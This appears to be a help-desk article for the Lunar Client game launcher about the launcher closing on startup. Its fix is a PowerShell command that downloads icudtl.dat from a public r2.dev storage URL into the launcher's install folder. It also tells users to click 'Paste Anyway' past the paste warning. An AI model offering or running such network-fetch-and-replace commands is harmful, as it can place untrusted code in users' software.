Lunar Client Closes Upon Opening

Modified on Sat, Jun 13 at 11:15 AM

Some players are experiencing an issue where Lunar Client closes immediately after launching caused by launching Badlion Client, following the most recent Launcher update. This only affects a small portion of users. To fix this issue:


1. Open Powershell

2. Execute the following command. If prompted when copying press "Paste Anyway" and hit Enter:



$dirs = @(
    "$env:LOCALAPPDATA\Programs\lunarclient",
    "$env:LOCALAPPDATA\Programs\Lunar Client",
    "$env:LOCALAPPDATA\Programs\launcher"
)

$target = $dirs | Where-Object { Test-Path $_ } | Select-Object -First 1
if ($target) {     Invoke-WebRequest "https://pub-297c6a58c72443ab9ecc42efedc70805.r2.dev/icudtl.dat" -OutFile "$target\icudtl.dat"     Write-Host "Replaced icudtl.dat in: $target" } else {     Write-Host "Neither Lunar Client folder was found under $env:LOCALAPPDATA\Programs" }


This should now fix your issue and you should be able to open the Launcher again. Ensure you have updated your Lunar Client launcher before attempting to open Badlion Client.

Was this article helpful?

That’s Great!

Thank you for your feedback

Sorry! We couldn't be helpful

Thank you for your feedback

Let us know how can we improve this article!

Select at least one of the reasons
CAPTCHA verification is required.

Feedback sent

We appreciate your effort and will try to fix the article